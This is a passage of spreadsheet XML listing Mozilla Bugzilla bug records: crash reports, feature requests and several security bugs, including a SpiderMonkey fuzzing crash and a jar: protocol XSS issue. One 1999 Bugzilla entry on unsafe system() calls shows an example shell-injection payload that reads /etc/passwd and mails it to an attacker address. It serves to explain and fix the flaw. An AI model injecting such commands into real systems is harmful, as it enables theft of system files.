      <c r="K5246" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5246" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5246" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5246" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5246" t="inlineStr">
        <is>
          <t>[fuzzblocker] [jsbugmon:][adv-main46+]</t>
        </is>
      </c>
      <c r="Q5246" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5246" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5246" t="inlineStr">
        <is>
          <t>mozilla46</t>
        </is>
      </c>
      <c r="T5246" t="n">
        <v>1</v>
      </c>
      <c r="U5246" t="n">
        <v>0</v>
      </c>
      <c r="V5246" t="n">
        <v>40</v>
      </c>
      <c r="W5246" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 470f4f8c2b2d (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --target=i686-pc-linux-gnu --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-offthread-compile=off):
function g() {
    "use asm";
    function f() {
        gczeal(2);
    }
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
0x08200c2a in js::wasm::ToMIRType (vt=js::wasm::I32) at js/src/asmjs/Wasm.h:56
#0  0x08200c2a in js::wasm::ToMIRType (vt=js::wasm::I32) at js/src/asmjs/Wasm.h:56
#1  0x08234f35 in FunctionCompiler::passArg (this=this@entry=0xffff9200, argDef=0xf7a9c588, type=js::wasm::I32, call=call@entry=0xffff8f70) at js/src/asmjs/WasmIonCompile.cpp:664
#2  0x082179cc in EmitCallArgs (f=..., sig=..., call=call@entry=0xffff8f70) at js/src/asmjs/WasmIonCompile.cpp:1542
#3  0x0821849e in EmitInternalCall (f=..., ret=ret@entry=js::wasm::Void, def=def@entry=0xffff9050) at js/src/asmjs/WasmIonCompile.cpp:1567
#4  0x0821454d in EmitStatement (f=..., stmt=&lt;optimized out&gt;, maybeLabels=0x0) at js/src/asmjs/WasmIonCompile.cpp:2497
#5  0x08214739 in EmitStatement (f=..., maybeLabels=0x0) at js/src/asmjs/WasmIonCompile.cpp:2515
#6  0x0821d2e5 in js::wasm::CompileFunction (task=0xf7a9b000) at js/src/asmjs/WasmIonCompile.cpp:2949
#7  0x081ccb88 in js::wasm::ModuleGenerator::finishFunc (this=0xffffa398, funcIndex=1, sig=..., generateTime=0, fg=0xffffa1e8) at js/src/asmjs/WasmGenerator.cpp:180
#8  0x081e4c15 in finish (generateTime=&lt;optimized out&gt;, sig=..., funcIndex=&lt;optimized out&gt;, this=0xffffa1e0) at js/src/asmjs/AsmJSValidate.cpp:2087
#9  CheckFunction (m=...) at js/src/asmjs/AsmJSValidate.cpp:6578
#10 CheckFunctions (m=...) at js/src/asmjs/AsmJSValidate.cpp:6609
#11 CheckModule (cx=cx@entry=0xf7a7b020, parser=..., stmtList=stmtList@entry=0xf7a880e8, module=module@entry=0xffffb1e0, time=time@entry=0xffffb1dc, slowFuncs=slowFuncs@entry=0xffffb220) at js/src/asmjs/AsmJSValidate.cpp:6829
#12 0x081eaff3 in js::ValidateAsmJS (cx=0xf7a7b020, parser=..., stmtList=stmtList@entry=0xf7a880e8, validated=validated@entry=0xffffb270) at js/src/asmjs/AsmJSValidate.cpp:6992
#13 0x08130195 in js::frontend::Parser&lt;js::frontend::FullParseHandler&gt;::asmJS (this=0xffffc0d8, list=0xf7a880e8) at js/src/frontend/Parser.cpp:3184
[...]
#35 main (argc=5, argv=0xffffce24, envp=0xffffce3c) at js/src/shell/js.cpp:6874
eax	0x4d430000	1296236544
ebx	0x9822970	159525232
ecx	0x0	0
edx	0x0	0
esi	0xffff8f70	-28816
edi	0xffff9200	-28160
ebp	0xffff8e78	4294938232
esp	0xffff8e60	4294938208
eip	0x8200c2a &lt;js::wasm::ToMIRType(js::wasm::ValType)+26&gt;
=&gt; 0x8200c2a &lt;js::wasm::ToMIRType(js::wasm::ValType)+26&gt;:	mov    -0x1621d38(%ebx,%eax,4),%eax
   0x8200c31 &lt;js::wasm::ToMIRType(js::wasm::ValType)+33&gt;:	mov    %ebx,%ecx</t>
        </is>
      </c>
      <c r="X5246" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5247">
      <c r="A5247" t="n">
        <v>960157</v>
      </c>
      <c r="B5247" t="inlineStr">
        <is>
          <t>2014-01-15 10:10:43 -0800</t>
        </is>
      </c>
      <c r="C5247" t="inlineStr">
        <is>
          <t>Payment failing for app</t>
        </is>
      </c>
      <c r="D5247" t="inlineStr">
        <is>
          <t>2014-01-20 13:35:31 -0800</t>
        </is>
      </c>
      <c r="E5247" t="n">
        <v>1</v>
      </c>
      <c r="F5247" t="n">
        <v>1</v>
      </c>
      <c r="G5247" t="n">
        <v>6</v>
      </c>
      <c r="H5247" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5247" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5247" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K5247" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L5247" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5247" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5247" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5247" t="inlineStr"/>
      <c r="Q5247" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5247" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5247" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5247" t="n">
        <v>1</v>
      </c>
      <c r="U5247" t="n">
        <v>0</v>
      </c>
      <c r="V5247" t="n">
        <v>8</v>
      </c>
      <c r="W5247" t="inlineStr">
        <is>
          <t>The developer of an app is reporting that they are getting an error on trying a payment. The issue was reported on the mailing list here:
https://groups.google.com/forum/#!topic/mozilla.dev.webapps/0a4Xp6O9Yzw
When trying it, I get:
https://marketplace.firefox.com/mozpay/bango/error?ResponseCode=NOT_SUPPORTED&amp;ResponseMessage=The+user+or+operator+(e.g.+MVNO)+is+not+supported+by+the+biller...
The app is:
https://marketplace.firefox.com/app/facing-mecca
Its package id on Bango is: 
1011695</t>
        </is>
      </c>
      <c r="X5247" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5248">
      <c r="A5248" t="n">
        <v>369814</v>
      </c>
      <c r="B5248" t="inlineStr">
        <is>
          <t>2007-02-08 20:51:23 -0800</t>
        </is>
      </c>
      <c r="C5248" t="inlineStr">
        <is>
          <t>jar: protocol is an XSS hazard due to ignoring mime type and being considered same-origin with hosting site</t>
        </is>
      </c>
      <c r="D5248" t="inlineStr">
        <is>
          <t>2011-05-03 14:02:34 -0700</t>
        </is>
      </c>
      <c r="E5248" t="n">
        <v>1</v>
      </c>
      <c r="F5248" t="n">
        <v>1</v>
      </c>
      <c r="G5248" t="n">
        <v>3</v>
      </c>
      <c r="H5248" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5248" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5248" t="inlineStr">
        <is>
          <t>Networking: JAR</t>
        </is>
      </c>
      <c r="K5248" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5248" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5248" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5248" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5248" t="inlineStr">
        <is>
          <t>[sg:high] XSS against sites that allow uploads of files such as images - looking for new networking owner</t>
        </is>
      </c>
      <c r="Q5248" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5248" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5248" t="inlineStr">
        <is>
          <t>mozilla1.9beta2</t>
        </is>
      </c>
      <c r="T5248" t="n">
        <v>1</v>
      </c>
      <c r="U5248" t="n">
        <v>2</v>
      </c>
      <c r="V5248" t="n">
        <v>149</v>
      </c>
      <c r="W5248" t="inlineStr">
        <is>
          <t>Any site that allows image uploads (e.g. avatar images) without binary content sniffing is likely to be vulnerable to XSS (in Gecko browsers only) as a result.  An attacker would only have to upload a malicious zip file to the site and get users to follow a jar: link.
Possible fixes:
* Refuse to open zip file contents with jar: unless the file has a mime type appropriate for zips, such as application/zip.
* Make jar: not be considered same-origin with the rest of the hosting domain, but only with other contents of the jar.
* Both of the above.</t>
        </is>
      </c>
      <c r="X5248" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5249">
      <c r="A5249" t="n">
        <v>778124</v>
      </c>
      <c r="B5249" t="inlineStr">
        <is>
          <t>2012-07-27 06:37:05 -0700</t>
        </is>
      </c>
      <c r="C5249" t="inlineStr">
        <is>
          <t>[ia] Implement new locale switcher view</t>
        </is>
      </c>
      <c r="D5249" t="inlineStr">
        <is>
          <t>2012-08-09 06:25:52 -0700</t>
        </is>
      </c>
      <c r="E5249" t="n">
        <v>1</v>
      </c>
      <c r="F5249" t="n">
        <v>1</v>
      </c>
      <c r="G5249" t="n">
        <v>5</v>
      </c>
      <c r="H5249" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5249" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5249" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5249" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5249" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5249" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5249" t="inlineStr">
        <is>
          <t>u=user c=general p=2</t>
        </is>
      </c>
      <c r="Q5249" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5249" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5249" t="inlineStr">
        <is>
          <t>2012.15</t>
        </is>
      </c>
      <c r="T5249" t="n">
        <v>1</v>
      </c>
      <c r="U5249" t="n">
        <v>0</v>
      </c>
      <c r="V5249" t="n">
        <v>13</v>
      </c>
      <c r="W5249" t="inlineStr">
        <is>
          <t>The designs for the new IA have a page for switching locale that is linked to from the new header. This replaces the current dropdown selector in the footer.
Some details:
* The view should probably live in apps/sumo, unless you can think of a more logical home for it.
* The url should be /&lt;current locale&gt;/locales
* After selecting a language, the user should be redirected back to the same page they were on before but in the new locale. This is tricky for KB pages because the slug can be different for each locale. See current implementation.
This bug is about getting the working view in and linked to from the header (bug 777509). We'll deal with nailing the style in a later bug (we don't have designs for this page yet).</t>
        </is>
      </c>
      <c r="X5249" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5250">
      <c r="A5250" t="n">
        <v>849902</v>
      </c>
      <c r="B5250" t="inlineStr">
        <is>
          <t>2013-03-11 10:56:06 -0700</t>
        </is>
      </c>
      <c r="C5250" t="inlineStr">
        <is>
          <t>my dashboard should be able to refresh on its own</t>
        </is>
      </c>
      <c r="D5250" t="inlineStr">
        <is>
          <t>2020-03-24 10:05:18 -0700</t>
        </is>
      </c>
      <c r="E5250" t="n">
        <v>1</v>
      </c>
      <c r="F5250" t="n">
        <v>1</v>
      </c>
      <c r="G5250" t="n">
        <v>7</v>
      </c>
      <c r="H5250" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5250" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J5250" t="inlineStr">
        <is>
          <t>MyDashboard</t>
        </is>
      </c>
      <c r="K5250" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L5250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5250" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5250" t="inlineStr"/>
      <c r="Q5250" t="inlineStr">
        <is>
          <t>P5</t>
        </is>
      </c>
      <c r="R5250" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5250" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5250" t="n">
        <v>1</v>
      </c>
      <c r="U5250" t="n">
        <v>0</v>
      </c>
      <c r="V5250" t="n">
        <v>13</v>
      </c>
      <c r="W5250" t="inlineStr">
        <is>
          <t>I really really love the new "My Dashboard" feature on b.m.o, but I find myself refreshing the entire page whenever I switch to that tab, because it's quicker than finding all of the "Refresh" links for the different sections.
It'd be great if the dashboard could refresh itself every N minutes.</t>
        </is>
      </c>
      <c r="X5250" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5251">
      <c r="A5251" t="n">
        <v>701805</v>
      </c>
      <c r="B5251" t="inlineStr">
        <is>
          <t>2011-11-11 11:42:57 -0800</t>
        </is>
      </c>
      <c r="C5251" t="inlineStr">
        <is>
          <t>Return mw32-ix-slave21 to the preproduction pool</t>
        </is>
      </c>
      <c r="D5251" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5251" t="n">
        <v>1</v>
      </c>
      <c r="F5251" t="n">
        <v>1</v>
      </c>
      <c r="G5251" t="n">
        <v>5</v>
      </c>
      <c r="H5251" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5251" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5251" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5251" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5251" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5251" t="inlineStr">
        <is>
          <t>Windows Server 2003</t>
        </is>
      </c>
      <c r="N5251" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5251" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5251" t="inlineStr">
        <is>
          <t>[buildduty][buildslaves]</t>
        </is>
      </c>
      <c r="Q5251" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5251" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5251" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5251" t="n">
        <v>1</v>
      </c>
      <c r="U5251" t="n">
        <v>0</v>
      </c>
      <c r="V5251" t="n">
        <v>5</v>
      </c>
      <c r="W5251" t="inlineStr">
        <is>
          <t>I did some terrible things to it, and it needs a fresh start</t>
        </is>
      </c>
      <c r="X5251" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5252">
      <c r="A5252" t="n">
        <v>612954</v>
      </c>
      <c r="B5252" t="inlineStr">
        <is>
          <t>2010-11-17 11:42:34 -0800</t>
        </is>
      </c>
      <c r="C5252" t="inlineStr">
        <is>
          <t>Update Firefox 4 Beta 8 features page</t>
        </is>
      </c>
      <c r="D5252" t="inlineStr">
        <is>
          <t>2013-09-29 12:42:00 -0700</t>
        </is>
      </c>
      <c r="E5252" t="n">
        <v>1</v>
      </c>
      <c r="F5252" t="n">
        <v>1</v>
      </c>
      <c r="G5252" t="n">
        <v>5</v>
      </c>
      <c r="H5252" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5252" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J5252" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5252" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5252" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5252" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5252" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5252" t="inlineStr"/>
      <c r="Q5252" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5252" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5252" t="inlineStr">
        <is>
          <t>4.0</t>
        </is>
      </c>
      <c r="T5252" t="n">
        <v>1</v>
      </c>
      <c r="U5252" t="n">
        <v>0</v>
      </c>
      <c r="V5252" t="n">
        <v>18</v>
      </c>
      <c r="W5252" t="inlineStr">
        <is>
          <t>Copy and new speed graphic coming soon!</t>
        </is>
      </c>
      <c r="X5252" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5253">
      <c r="A5253" t="n">
        <v>1474441</v>
      </c>
      <c r="B5253" t="inlineStr">
        <is>
          <t>2018-07-09 14:38:55 -0700</t>
        </is>
      </c>
      <c r="C5253" t="inlineStr">
        <is>
          <t>add support for testing the new React-based front end</t>
        </is>
      </c>
      <c r="D5253" t="inlineStr">
        <is>
          <t>2018-07-12 08:34:06 -0700</t>
        </is>
      </c>
      <c r="E5253" t="n">
        <v>1</v>
      </c>
      <c r="F5253" t="n">
        <v>1</v>
      </c>
      <c r="G5253" t="n">
        <v>4</v>
      </c>
      <c r="H5253" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5253" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5253" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K5253" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5253" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5253" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5253" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5253" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5253" t="inlineStr"/>
      <c r="Q5253" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5253" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5253" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5253" t="n">
        <v>1</v>
      </c>
      <c r="U5253" t="n">
        <v>0</v>
      </c>
      <c r="V5253" t="n">
        <v>2</v>
      </c>
      <c r="W5253" t="inlineStr">
        <is>
          <t>We are in the process of adding scaffolding for development of React front-end components: https://github.com/mozilla-services/socorro/pull/4494. Part of the reason behind this endeavor is to improve Socorro's testing capabilities for the front-end parts of the application.
This bug implies adding the functionality that will allow for running tests against this new front end. :Osmose mentioned adding Enzyme (https://github.com/airbnb/enzyme) to test React components. To run Enzyme tests, I suggest using Jest (https://github.com/facebook/jest).</t>
        </is>
      </c>
      <c r="X5253" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5254">
      <c r="A5254" t="n">
        <v>848471</v>
      </c>
      <c r="B5254" t="inlineStr">
        <is>
          <t>2013-03-06 11:26:01 -0800</t>
        </is>
      </c>
      <c r="C5254" t="inlineStr">
        <is>
          <t>Create an API endpoint for editing ratings</t>
        </is>
      </c>
      <c r="D5254" t="inlineStr">
        <is>
          <t>2013-04-08 14:38:20 -0700</t>
        </is>
      </c>
      <c r="E5254" t="n">
        <v>1</v>
      </c>
      <c r="F5254" t="n">
        <v>1</v>
      </c>
      <c r="G5254" t="n">
        <v>6</v>
      </c>
      <c r="H5254" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5254" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J5254" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K5254" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L5254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5254" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5254" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5254" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5254" t="inlineStr">
        <is>
          <t>[fireplace] p=1</t>
        </is>
      </c>
      <c r="Q5254" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5254" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5254" t="inlineStr">
        <is>
          <t>2013-03-28</t>
        </is>
      </c>
      <c r="T5254" t="n">
        <v>1</v>
      </c>
      <c r="U5254" t="n">
        <v>0</v>
      </c>
      <c r="V5254" t="n">
        <v>2</v>
      </c>
      <c r="W5254" t="inlineStr">
        <is>
          <t>You must be the original author of a Review to edit it.
Fields to accept:
* `user` (required)
* `rating` (required)
* `body` (required)</t>
        </is>
      </c>
      <c r="X5254" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5255">
      <c r="A5255" t="n">
        <v>511649</v>
      </c>
      <c r="B5255" t="inlineStr">
        <is>
          <t>2009-08-20 08:20:09 -0700</t>
        </is>
      </c>
      <c r="C5255" t="inlineStr">
        <is>
          <t>Cannot find http://en-us.www.mozilla.com/en-US/firefox/3.6a2pre/firstrun</t>
        </is>
      </c>
      <c r="D5255" t="inlineStr">
        <is>
          <t>2009-10-26 14:26:19 -0700</t>
        </is>
      </c>
      <c r="E5255" t="n">
        <v>1</v>
      </c>
      <c r="F5255" t="n">
        <v>1</v>
      </c>
      <c r="G5255" t="n">
        <v>2</v>
      </c>
      <c r="H5255" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5255" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5255" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5255" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5255" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M5255" t="inlineStr">
        <is>
          <t>Windows CE</t>
        </is>
      </c>
      <c r="N5255" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5255" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5255" t="inlineStr">
        <is>
          <t>[nv]</t>
        </is>
      </c>
      <c r="Q5255" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5255" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5255" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5255" t="n">
        <v>1</v>
      </c>
      <c r="U5255" t="n">
        <v>0</v>
      </c>
      <c r="V5255" t="n">
        <v>6</v>
      </c>
      <c r="W5255" t="inlineStr">
        <is>
          <t>On first install Firefox by default attempts to load 
http://en-us.www.mozilla.com/en-US/firefox/3.6a2pre/firstrun
But is unable to file this page.  Firefox needs default to a valid page (or have Mozilla set up the correct page for the WinCE builds on www.mozilla.com).</t>
        </is>
      </c>
      <c r="X5255" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5256">
      <c r="A5256" t="n">
        <v>21253</v>
      </c>
      <c r="B5256" t="inlineStr">
        <is>
          <t>1999-12-08 21:04:25 -0800</t>
        </is>
      </c>
      <c r="C5256" t="inlineStr">
        <is>
          <t>remove single-parameter system() calls from Bugzilla</t>
        </is>
      </c>
      <c r="D5256" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:20 -0800</t>
        </is>
      </c>
      <c r="E5256" t="n">
        <v>1</v>
      </c>
      <c r="F5256" t="n">
        <v>1</v>
      </c>
      <c r="G5256" t="n">
        <v>4</v>
      </c>
      <c r="H5256" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5256" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5256" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5256" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5256" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5256" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N5256" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5256" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5256" t="inlineStr"/>
      <c r="Q5256" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5256" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5256" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T5256" t="n">
        <v>1</v>
      </c>
      <c r="U5256" t="n">
        <v>0</v>
      </c>
      <c r="V5256" t="n">
        <v>46</v>
      </c>
      <c r="W5256" t="inlineStr">
        <is>
          <t>The processmail script is called using system().  Almost every call of
processmail puts unchecked values from the CGI forms in the command-line that's
given to the shell.  This means that people can execute arbitrary commands by
embedding shell meta-characters (eg `cat /etc/passwd | mail
cracker@badboyz.org`) in CGI form variables.
Ways to fix this include either making processmail take this information from
stdin, or carefully stripping shell metachars out of the command line, or giving
up on system() and doing the fork/exec directly.</t>
        </is>
      </c>
      <c r="X5256" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5257">
      <c r="A5257" t="n">
        <v>2530</v>
      </c>
      <c r="B5257" t="inlineStr">
        <is>
          <t>1999-01-20 20:19:00 -0800</t>
        </is>
      </c>
      <c r="C5257" t="inlineStr">
        <is>
          <t>mulivalued lists do not maintain their order</t>
        </is>
      </c>
      <c r="D5257" t="inlineStr">
        <is>
          <t>1999-04-21 11:23:30 -0700</t>
        </is>
      </c>
      <c r="E5257" t="n">
        <v>1</v>
      </c>
      <c r="F5257" t="n">
        <v>1</v>
      </c>
      <c r="G5257" t="n">
        <v>3</v>
      </c>
      <c r="H5257" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5257" t="inlineStr">
        <is>
          <t>Directory</t>
        </is>
      </c>
      <c r="J5257" t="inlineStr">
        <is>
          <t>PerLDAP</t>
        </is>
      </c>
      <c r="K5257" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5257" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5257" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5257" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5257" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5257" t="inlineStr"/>
      <c r="Q5257" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5257" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5257" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5257" t="n">
        <v>1</v>
      </c>
      <c r="U5257" t="n">
        <v>0</v>
      </c>
      <c r="V5257" t="n">
        <v>4</v>
      </c>
      <c r="W5257" t="inlineStr">
        <is>
          <t>If I add values to an entry object in the order
1,2,3,4
the update method to Conn.pm may, or may not preserve their order.  The problem
is in the way update() checks for duplicate values in the multivalued lists.
The problem code is:
      if ($#vals == $[)
        {
          $mod{$key} = { "rb", [$vals[$[]] };
        }
      else
        {
          @arr = ();
          grep(($new{$_} = 1), @vals);
          foreach (@{$entry-&gt;{"_${key}_save_"}})
        {
          if (! $new{$_})
            {
              push(@arr, $_);
            }
          $new{$_} = 0;
        }
          $mod{$key}{"db"} = [@arr] if ($#arr &gt;= $[);
          @arr = ();
          foreach (keys(%new))
        {
          push(@arr, $_) if ($new{$_} == 1);
        }
          $mod{$key}{"ab"} = [@arr] if ($#arr &gt;= $[);
        }
The problem is that doing a foreach on the keys in %new doesn't preserve their
order.  Here is an example of how to create a @arr from @vals without changing
the order of the values in @arr:
    foreach $value (@vals) {
        if($check{lc($value)}) { next; }
        else {
            $check{lc($value)} = 1;
            push(@arr, $value);
            }
        }</t>
        </is>
      </c>
      <c r="X5257" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5258">
      <c r="A5258" t="n">
        <v>1022945</v>
      </c>
      <c r="B5258" t="inlineStr">
        <is>
          <t>2014-06-09 15:10:01 -0700</t>
        </is>
      </c>
      <c r="C5258" t="inlineStr">
        <is>
          <t>Shutdown crash with many mozGetUserMedia calls</t>
        </is>
      </c>
      <c r="D5258" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:29 -0700</t>
        </is>
      </c>
